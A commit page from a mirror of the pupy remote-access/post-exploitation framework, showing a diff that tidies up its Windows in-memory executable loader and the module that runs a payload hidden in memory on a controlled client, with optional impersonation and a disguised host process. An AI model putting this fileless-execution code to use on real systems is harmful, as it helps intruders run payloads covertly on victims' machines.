Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

windows/memexec: Fix cleanup a bit

This commit is contained in:
Oleksii Shevchuk 2018-11-29 15:36:18 +02:00
parent bd7e256c2b
commit 8438b28554
2 changed files with 25 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
pupy/modules/duplicate.py
View File

@ -39,7 +39,8 @@ class MemoryDuplicate(PupyModule):
if self.client.is_windows(): if self.client.is_windows():
exec_pe( exec_pe(
self, "", raw_pe=payload, interactive=False, self, "", raw_pe=payload, interactive=False,
use_impersonation=args.impersonate, suspended_process=args.process use_impersonation=args.impersonate, suspended_process=args.process,
wait=False
) )
elif self.client.is_linux(): elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', raw=True) mexec(self, payload, [], argv0='/bin/bash', raw=True)

33
pupy/modules/lib/windows/memory_exec.py
View File

@ -7,7 +7,7 @@ from modules.lib.utils.cmdrepl import CmdRepl
import threading import threading
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_impersonation=False, suspended_process="cmd.exe", codepage=None): def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_impersonation=False, suspended_process="cmd.exe", codepage=None, wait=True):
if not raw_pe and not path: if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied") raise Exception("raw_pe or path must be supplied")
@ -42,7 +42,7 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
if not hasattr(module, 'mp'): if not hasattr(module, 'mp'):
setattr(module, 'mp', None) setattr(module, 'mp', None)
module.mp = module.client.conn.modules[ mp = module.client.conn.modules[
'pupwinutils.memexec' 'pupwinutils.memexec'
].MemoryPE( ].MemoryPE(
raw_pe, args=prog_args, hidden=True, raw_pe, args=prog_args, hidden=True,
@ -50,26 +50,29 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
dupHandle=dupHandle dupHandle=dupHandle
) )
module.mp = mp
complete = threading.Event() complete = threading.Event()
stdout = None
if interactive: if interactive:
repl, _ = CmdRepl.thread( repl, _ = CmdRepl.thread(
module.stdout, module.stdout,
module.mp.write, mp.write,
complete, complete,
True, None, True, None,
codepage codepage
) )
module.client.conn.register_remote_cleanup( module.client.conn.register_remote_cleanup(
module.mp.close mp.close
) )
if module.mp.execute(complete.set, repl._con_write):
if mp.execute(complete.set, repl._con_write):
complete.wait() complete.wait()
module.mp.close() mp.close()
module.client.conn.unregister_remote_cleanup( module.client.conn.unregister_remote_cleanup(
module.mp.close mp.close
) )
module.success('Process exited. Press ENTER') module.success('Process exited. Press ENTER')
@ -77,11 +80,21 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
complete.set() complete.set()
module.error('Launch failed. Press ENTER') module.error('Launch failed. Press ENTER')
else: else:
pid = module.mp.execute(complete.set) pid = mp.execute(complete.set)
if pid: if pid:
complete.wait()
module.success('[Process launched: PID={}]'.format(pid)) module.success('[Process launched: PID={}]'.format(pid))
if not wait:
mp.close()
module.mp = None
return
complete.wait()
stdout = mp.stdout
mp.close()
module.mp = None
else: else:
module.error('Launch failed') module.error('Launch failed')
return module.mp.stdout return stdout